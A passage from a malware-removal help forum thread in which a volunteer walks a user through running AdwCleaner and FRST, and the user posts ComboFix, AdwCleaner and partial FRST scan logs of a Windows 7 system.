"F.lux"="c:\users\Tom Jones\AppData\Local\FluxSoftware\Flux\flux.exe" [2013-10-23 1017224]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"Logitech G35"="c:\program files (x86)\Logitech\G35\G35.exe" [2010-10-05 1811800]
"JMB36X IDE Setup"="c:\windows\RaidTool\xInsIDE.exe" [2010-01-19 43632]
"Adobe ARM"="c:\program files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2014-11-20 1021128]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
NETGEAR WPN111 Smart Wizard.lnk - c:\program files (x86)\NETGEAR\WPN111\wpn111.exe [2012-3-24 995328]
SetPointII.lnk - c:\program files\Logitech\SetPoint II\SetPointII.exe [2009-7-21 815104]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"PromptOnSecureDesktop"= 0 (0x0)
"SoftwareSASGeneration"= 1 (0x1)
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\drivers32]
"aux9"=wdmaud.drv
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ   autocheck autochk *\0\0sdnclean64.exe
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSvc]
@="Service"
.
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R2 SkypeUpdate;Skype Updater;e:\program files\Skype\Updater\Updater.exe;e:\program files\Skype\Updater\Updater.exe [x]
R3 acsock;acsock;c:\windows\system32\DRIVERS\acsock64.sys;c:\windows\SYSNATIVE\DRIVERS\acsock64.sys [x]
R3 ALSysIO;ALSysIO;c:\users\TomSP~1\AppData\Local\Temp\ALSysIO64.sys;c:\users\TomSP~1\AppData\Local\Temp\ALSysIO64.sys [x]
R3 c2wts;Claims to Windows Token Service;c:\program files\Windows Identity Foundation\v3.5\c2wtshost.exe;c:\program files\Windows Identity Foundation\v3.5\c2wtshost.exe [x]
R3 dmvsc;dmvsc;c:\windows\system32\drivers\dmvsc.sys;c:\windows\SYSNATIVE\drivers\dmvsc.sys [x]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe;c:\windows\SYSNATIVE\IEEtwCollector.exe [x]
R3 IntcDAud;Intel® Display Audio;c:\windows\system32\DRIVERS\IntcDAud.sys;c:\windows\SYSNATIVE\DRIVERS\IntcDAud.sys [x]
R3 MotioninJoyXFilter;MotioninJoy Virtual Xinput device Filter Driver;c:\windows\system32\DRIVERS\MijXfilt.sys;c:\windows\SYSNATIVE\DRIVERS\MijXfilt.sys [x]
R3 NisDrv;Microsoft Network Inspection System;c:\windows\system32\DRIVERS\NisDrvWFP.sys;c:\windows\SYSNATIVE\DRIVERS\NisDrvWFP.sys [x]
R3 NisSrv;Microsoft Network Inspection;c:\program files\Microsoft Security Client\NisSrv.exe;c:\program files\Microsoft Security Client\NisSrv.exe [x]
R3 PCAMp50a64;PCAMp50a64 NDIS Protocol Driver;c:\windows\system32\Drivers\PCAMp50a64.sys;c:\windows\SYSNATIVE\Drivers\PCAMp50a64.sys [x]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys;c:\windows\SYSNATIVE\drivers\rdpvideominiport.sys [x]
R3 rspCrash;rspCrash;c:\windows\system32\DRIVERS\rspCrash64.sys;c:\windows\SYSNATIVE\DRIVERS\rspCrash64.sys [x]
R3 s1018bus;Sony Ericsson Device 1018 driver (WDM);c:\windows\system32\DRIVERS\s1018bus.sys;c:\windows\SYSNATIVE\DRIVERS\s1018bus.sys [x]
R3 s1018mdfl;Sony Ericsson Device 1018 USB WMC Modem Filter;c:\windows\system32\DRIVERS\s1018mdfl.sys;c:\windows\SYSNATIVE\DRIVERS\s1018mdfl.sys [x]
R3 s1018mdm;Sony Ericsson Device 1018 USB WMC Modem Driver;c:\windows\system32\DRIVERS\s1018mdm.sys;c:\windows\SYSNATIVE\DRIVERS\s1018mdm.sys [x]
R3 s1018mgmt;Sony Ericsson Device 1018 USB WMC Device Management Drivers (WDM);c:\windows\system32\DRIVERS\s1018mgmt.sys;c:\windows\SYSNATIVE\DRIVERS\s1018mgmt.sys [x]
R3 s1018nd5;Sony Ericsson Device 1018 USB Ethernet Emulation (NDIS);c:\windows\system32\DRIVERS\s1018nd5.sys;c:\windows\SYSNATIVE\DRIVERS\s1018nd5.sys [x]
R3 s1018obex;Sony Ericsson Device 1018 USB WMC OBEX Interface;c:\windows\system32\DRIVERS\s1018obex.sys;c:\windows\SYSNATIVE\DRIVERS\s1018obex.sys [x]
R3 s1018unic;Sony Ericsson Device 1018 USB Ethernet Emulation (WDM);c:\windows\system32\DRIVERS\s1018unic.sys;c:\windows\SYSNATIVE\DRIVERS\s1018unic.sys [x]
R3 SaiK0836;SaiK0836;c:\windows\system32\DRIVERS\SaiK0836.sys;c:\windows\SYSNATIVE\DRIVERS\SaiK0836.sys [x]
R3 Synth3dVsc;Synth3dVsc;c:\windows\system32\drivers\synth3dvsc.sys;c:\windows\SYSNATIVE\drivers\synth3dvsc.sys [x]
R3 Te.Service;Te.Service;c:\program files (x86)\Windows Kits\8.1\Testing\Runtimes\TAEF\Wex.Services.exe;c:\program files (x86)\Windows Kits\8.1\Testing\Runtimes\TAEF\Wex.Services.exe [x]
R3 terminpt;Microsoft Remote Desktop Input Driver;c:\windows\system32\drivers\terminpt.sys;c:\windows\SYSNATIVE\drivers\terminpt.sys [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys;c:\windows\SYSNATIVE\drivers\TsUsbGD.sys [x]
R3 tsusbhub;tsusbhub;c:\windows\system32\drivers\tsusbhub.sys;c:\windows\SYSNATIVE\drivers\tsusbhub.sys [x]
R3 USBAAPL64;Apple Mobile USB Driver;c:\windows\system32\Drivers\usbaapl64.sys;c:\windows\SYSNATIVE\Drivers\usbaapl64.sys [x]
R3 VBoxUSB;VirtualBox USB;c:\windows\system32\Drivers\VBoxUSB.sys;c:\windows\SYSNATIVE\Drivers\VBoxUSB.sys [x]
R3 VsEtwService120;Visual Studio ETW Event Collection Service;c:\program files\Microsoft Visual Studio 12.0\Common7\Packages\Debugger\Services\VsEtwService.exe;c:\program files\Microsoft Visual Studio 12.0\Common7\Packages\Debugger\Services\VsEtwService.exe [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
R4 MSSQLServerADHelper100;SQL Active Directory Helper Service;c:\program files\Microsoft SQL Server\100\Shared\SQLADHLP.EXE;c:\program files\Microsoft SQL Server\100\Shared\SQLADHLP.EXE [x]
R4 RsFx0103;RsFx0103 Driver;c:\windows\system32\DRIVERS\RsFx0103.sys;c:\windows\SYSNATIVE\DRIVERS\RsFx0103.sys [x]
R4 SQLAgent$SQLEXPRESS;SQL Server Agent (SQLEXPRESS);c:\program files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE;c:\program files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE [x]
S0 mv91xx;mv91xx;c:\windows\system32\DRIVERS\mv91xx.sys;c:\windows\SYSNATIVE\DRIVERS\mv91xx.sys [x]
S1 VBoxDrv;VirtualBox Service;c:\windows\system32\DRIVERS\VBoxDrv.sys;c:\windows\SYSNATIVE\DRIVERS\VBoxDrv.sys [x]
S1 VBoxUSBMon;VirtualBox USB Monitor Driver;c:\windows\system32\DRIVERS\VBoxUSBMon.sys;c:\windows\SYSNATIVE\DRIVERS\VBoxUSBMon.sys [x]
S2 asComSvc;ASUS Com Service;c:\program files (x86)\ASUS\AXSP\1.00.13\atkexComSvc.exe;c:\program files (x86)\ASUS\AXSP\1.00.13\atkexComSvc.exe [x]
S2 asHmComSvc;ASUS HM Com Service;c:\program files (x86)\ASUS\AAHM\1.00.14\aaHMSvc.exe;c:\program files (x86)\ASUS\AAHM\1.00.14\aaHMSvc.exe [x]
S2 AsSysCtrlService;ASUS System Control Service;c:\program files (x86)\ASUS\AsSysCtrlService\1.00.11\AsSysCtrlService.exe;c:\program files (x86)\ASUS\AsSysCtrlService\1.00.11\AsSysCtrlService.exe [x]
S2 cpuz135;cpuz135;c:\windows\system32\drivers\cpuz135_x64.sys;c:\windows\SYSNATIVE\drivers\cpuz135_x64.sys [x]
S2 Intel® PROSet Monitoring Service;Intel® PROSet Monitoring Service;c:\windows\system32\IProsetMonitor.exe;c:\windows\SYSNATIVE\IProsetMonitor.exe [x]
S2 IntelHaxm;Intel HAXM Service;c:\windows\system32\DRIVERS\IntelHaxm.sys;c:\windows\SYSNATIVE\DRIVERS\IntelHaxm.sys [x]
S2 vpnagent;Cisco AnyConnect Secure Mobility Agent;c:\program files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnagent.exe;c:\program files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnagent.exe [x]
S3 LADF_DHP2;G35 DHP2 Filter Driver;c:\windows\system32\DRIVERS\ladfDHP2amd64.sys;c:\windows\SYSNATIVE\DRIVERS\ladfDHP2amd64.sys [x]
S3 LADF_SBVM;G35 SBVM Filter Driver;c:\windows\system32\DRIVERS\ladfSBVMamd64.sys;c:\windows\SYSNATIVE\DRIVERS\ladfSBVMamd64.sys [x]
S3 nusb3hub;Renesas Electronics USB 3.0 Hub Driver;c:\windows\system32\DRIVERS\nusb3hub.sys;c:\windows\SYSNATIVE\DRIVERS\nusb3hub.sys [x]
S3 nusb3xhc;Renesas Electronics USB 3.0 Host Controller Driver;c:\windows\system32\DRIVERS\nusb3xhc.sys;c:\windows\SYSNATIVE\DRIVERS\nusb3xhc.sys [x]
S3 nvvad_WaveExtensible;NVIDIA Virtual Audio Device (Wave Extensible) (WDM);c:\windows\system32\drivers\nvvad64v.sys;c:\windows\SYSNATIVE\drivers\nvvad64v.sys [x]
S3 PCASp50a64;PCASp50a64 NDIS Protocol Driver;c:\windows\system32\Drivers\PCASp50a64.sys;c:\windows\SYSNATIVE\Drivers\PCASp50a64.sys [x]
S3 RTCore64;RTCore64;e:\program files (x86)\MSI Afterburner\RTCore64.sys;e:\program files (x86)\MSI Afterburner\RTCore64.sys [x]
S3 VBoxNetAdp;VirtualBox Host-Only Ethernet Adapter;c:\windows\system32\DRIVERS\VBoxNetAdp.sys;c:\windows\SYSNATIVE\DRIVERS\VBoxNetAdp.sys [x]
S3 VBoxNetFlt;VirtualBox Bridged Networking Service;c:\windows\system32\DRIVERS\VBoxNetFlt.sys;c:\windows\SYSNATIVE\DRIVERS\VBoxNetFlt.sys [x]
S3 WPN111;Wireless USB 2.0 Adapter with RangeMax Service;c:\windows\system32\DRIVERS\WPN111vx.sys;c:\windows\SYSNATIVE\DRIVERS\WPN111vx.sys [x]
.
.
Contents of the 'Scheduled Tasks' folder
.
2015-01-25 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-265094073-1043058997-3425087786-1000Core.job
- c:\users\Tom Jones\AppData\Local\Google\Update\GoogleUpdate.exe [2013-02-22 00:41]
.
2015-01-25 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-265094073-1043058997-3425087786-1000UA.job
- c:\users\Tom Jones\AppData\Local\Google\Update\GoogleUpdate.exe [2013-02-22 00:41]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Kernel and Hardware Abstraction Layer"="KHALMNPR.EXE" [2009-06-17 130576]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2011-04-20 168216]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2011-04-20 392472]
"Persistence"="c:\windows\system32\igfxpers.exe" [2011-04-20 416024]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2014-08-22 1331288]
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
uStart Page = hxxp://www.google.com
mLocal Page = c:\windows\SysWOW64\blank.htm
IE: E&xport to Microsoft Excel - e:\progra~2\MICROS~1\Office12\EXCEL.EXE/3000
Trusted Zone: njit.edu\asa1
Trusted Zone: njit.edu\cad
Trusted Zone: njit.edu\webvpn
TCP: DhcpNameServer = 75.75.75.75 75.75.76.76
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\SecuROM\License information*]
"datasecu"=hex:73,2d,ea,2c,61,3f,48,7e,8b,84,1d,e4,99,89,3e,f8,a5,2d,33,63,63,
   ba,e4,f1,c8,f0,39,8e,d3,53,77,fd,48,a5,c6,56,0d,3c,62,4e,3d,b2,a0,b9,be,9f,\
"rkeysecu"=hex:af,66,20,01,21,ab,bc,2d,d8,0f,34,1d,48,48,34,57
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_16_0_0_257_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_16_0_0_257_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]
@Denied: (A 2) (Everyone)
@="IFlashBroker6"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_16_0_0_257_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_16_0_0_257_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_16_0_0_257.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.16"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_16_0_0_257.ocx, 1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_16_0_0_257.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_16_0_0_257.ocx, 1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]
@Denied: (A 2) (Everyone)
@="IFlashBroker6"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\software\Wow6432Node\Microsoft\Office\Common\Smart Tag\Actions\{B7EFF951-E52F-45CC-9EF7-57124F2177CC}]
@Denied: (A) (Everyone)
"Solution"="{15727DE6-F92D-4E46-ACB4-0E2C58B31A18}"
.
[HKEY_LOCAL_MACHINE\software\Wow6432Node\Microsoft\Schema Library\ActionsPane3]
@Denied: (A) (Everyone)
.
[HKEY_LOCAL_MACHINE\software\Wow6432Node\Microsoft\Schema Library\ActionsPane3\0]
"Key"="ActionsPane3"
"Location"="c:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTO\\ActionsPane3.xsd"
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0001\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Completion time: 2015-01-25  19:08:56
ComboFix-quarantined-files.txt  2015-01-26 00:08
ComboFix2.txt  2015-01-24 17:34
.
Pre-Run: 23,863,250,944 bytes free
Post-Run: 23,309,635,584 bytes free
.
- - End Of File - - 2BFE6944F28B8C18809FFED64E90C429
A36C5E4F47E84449FF07ED3517B43A31
 

 

 



#8 Johnny Computer

Johnny Computer

  • Malware Response Team
  • 1,739 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:127.0.0.1
  • Local time:11:21 AM

Posted 26 January 2015 - 07:54 AM

Hi TomFullerton-

 

I ought to delete it

 

 

Yes, now you may delete that file.

 


 ---------------------------------------------------------------------------------------------------

 

Please download AdwCleaner by Xplode and save to your Desktop.

§  Double click on AdwCleaner.exe to run the tool.
Vista/Windows 7/8 users right-click and select Run As Administrator

§  The tool will start to update the database, please wait a bit.

§  Click on I agree button.

§  Click on the Scan button.

§  AdwCleaner will begin...be patient as the scan may take some time to complete.

§  After the scan has finished, click on the Report button...a logfile (AdwCleaner[R#].txt) will open in Notepad for review (where the largest value of # represents the most recent report).

§  The contents of the log file may be confusing. Unless you see a program name that you know should not be removed, don't worry about it. If you see an entry you want to keep, let me know about it.

§  Copy and paste the contents of that logfile in your next reply.

§   A copy of all logfiles are saved in the C:\AdwCleaner folder which was created when running the tool

 

 --------------------------------------------------------------------------------------------------------------

 

IN YOUR NEXT REPLY I NEED:

 

1.) Confirmation that  the "Tom" file has been deleted

2.)  ADWCleaner log

 

 

Thanks  :)

 


avatar591802_2.gif"DO OR DO NOT. THERE IS NO TRY."


#9 tomfullerton

tomfullerton
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:12:21 PM

Posted 26 January 2015 - 06:22 PM

1. The file has been deleted

2. The report: ***I want to keep the chrome extension "hcdjknjpbnhdoabbngpmfekaecnpajba" and anything related to it.

 

 

# AdwCleaner v4.109 - Report created 26/01/2015 at 18:15:36
# Updated 24/01/2015 by Xplode
# Database : 2015-01-25.1 [Live]
# Operating System : Windows 7 Ultimate Service Pack 1 (64 bits)
# Username : Tom Jones - SSPC
# Running from : C:\Users\Tom Jones\Downloads\AdwCleaner.exe
# Option : Scan
 
***** [ Services ] *****
 
 
***** [ Files / Folders ] *****
 
File Found : C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_hcdjknjpbnhdoabbngpmfekaecnpajba_0.localstorage
File Found : C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_hcdjknjpbnhdoabbngpmfekaecnpajba_0.localstorage-journal
File Found : C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_static.ak.facebook.com_0.localstorage
File Found : C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_static.ak.facebook.com_0.localstorage-journal
Folder Found : C:\ProgramData\apn
Folder Found : C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcdjknjpbnhdoabbngpmfekaecnpajba
 
***** [ Scheduled Tasks ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
 
***** [ Browsers ] *****
 
-\\ Internet Explorer v11.0.9600.17496
 
 
-\\ Google Chrome v
 
 
*************************
 
AdwCleaner[R0].txt - [4039 octets] - [22/01/2015 20:49:39]
AdwCleaner[R1].txt - [1599 octets] - [23/01/2015 23:20:38]
AdwCleaner[R2].txt - [1494 octets] - [26/01/2015 18:15:36]
AdwCleaner[S0].txt - [3706 octets] - [22/01/2015 20:53:34]
AdwCleaner[S1].txt - [1665 octets] - [23/01/2015 23:25:12]
 
########## EOF - C:\AdwCleaner\AdwCleaner[R2].txt - [1674 octets] ##########


#10 Johnny Computer

Johnny Computer

  • Malware Response Team
  • 1,739 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:127.0.0.1
  • Local time:11:21 AM

Posted 27 January 2015 - 07:45 AM

Hi TomFullerton-

 

Double click on AdwCleaner.exe to run the tool again. Vista/Windows 7/8 users right-click and select Run As Administrator

§  The tool will start to update the database, please wait a bit.

§  Click on the Scan button.

§  AdwCleaner will begin to scan your computer like it did before.

§  After the scan has finished...
UNCHECK all items you would like to keep

§  This time click on the Clean button.

§  Press OK when asked to close all programs and follow the onscreen prompts.

§  Press OK again to allow AdwCleaner to restart the computer and complete the removal process.

§  After rebooting, a logfile report (AdwCleaner[S#].txt) will open automatically (where the largest value of # represents the most recent report).

§  Copy and paste the contents of that logfile in your next reply.

§  A copy of that logfile will also be saved in the C:\AdwCleaner folder.

 

 ---------------------------------------------------------------------------------------------------------------

 

Please re run FRST and post both the logs

 

-----------------------------------------------------------------------

 

IN YOUR NEXT REPLY I NEED:

 

1.)  ADWCleaner log

2.)  FRST Logs

3.)  How is your system running now?  Are you experiencing all, some, or none of the previous issues

 

Thanks  :)


avatar591802_2.gif"DO OR DO NOT. THERE IS NO TRY."


#11 tomfullerton

tomfullerton
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:12:21 PM

Posted 28 January 2015 - 02:30 PM

Attached 1 and 2.
3. I couldn't really say for sure.
 
 
1.     -----------------
 
# AdwCleaner v4.109 - Report created 28/01/2015 at 14:22:24
# Updated 24/01/2015 by Xplode
# Database : 2015-01-26.1 [Live]
# Operating System : Windows 7 Ultimate Service Pack 1 (64 bits)
# Username : Tom Jones - SSPC
# Running from : C:\Users\Tom Jones\Downloads\AdwCleaner.exe
# Option : Clean
 
***** [ Services ] *****
 
 
***** [ Files / Folders ] *****
 
Folder Deleted : C:\ProgramData\apn
[x] Not Deleted : C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcdjknjpbnhdoabbngpmfekaecnpajba
[x] Not Deleted : C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_hcdjknjpbnhdoabbngpmfekaecnpajba_0.localstorage
[x] Not Deleted : C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_hcdjknjpbnhdoabbngpmfekaecnpajba_0.localstorage-journal
File Deleted : C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_static.ak.facebook.com_0.localstorage
File Deleted : C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_static.ak.facebook.com_0.localstorage-journal
 
***** [ Scheduled Tasks ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
 
***** [ Browsers ] *****
 
-\\ Internet Explorer v11.0.9600.17496
 
 
-\\ Google Chrome v
 
 
*************************
 
AdwCleaner[R0].txt - [4039 octets] - [22/01/2015 20:49:39]
AdwCleaner[R1].txt - [1599 octets] - [23/01/2015 23:20:38]
AdwCleaner[R2].txt - [1740 octets] - [26/01/2015 18:15:36]
AdwCleaner[R3].txt - [1814 octets] - [28/01/2015 14:20:21]
AdwCleaner[S0].txt - [3706 octets] - [22/01/2015 20:53:34]
AdwCleaner[S1].txt - [1665 octets] - [23/01/2015 23:25:12]
AdwCleaner[S2].txt - [1754 octets] - [28/01/2015 14:22:24]
 
########## EOF - C:\AdwCleaner\AdwCleaner[S2].txt - [1814 octets] ##########
 
 
 
 
 
2.     ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 28-01-2015
Ran by Tom Jones (administrator) on SSPC on 28-01-2015 14:27:25
Running from C:\Users\Tom Jones\Downloads
Loaded Profiles: Tom Jones (Available profiles: Tom Jones)
Platform: Windows 7 Ultimate Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Cisco Systems, Inc.) C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnagent.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
() C:\Program Files (x86)\ASUS\AXSP\1.00.13\atkexComSvc.exe
() C:\Program Files (x86)\ASUS\AAHM\1.00.14\aaHMSvc.exe
() C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.11\AsSysCtrlService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
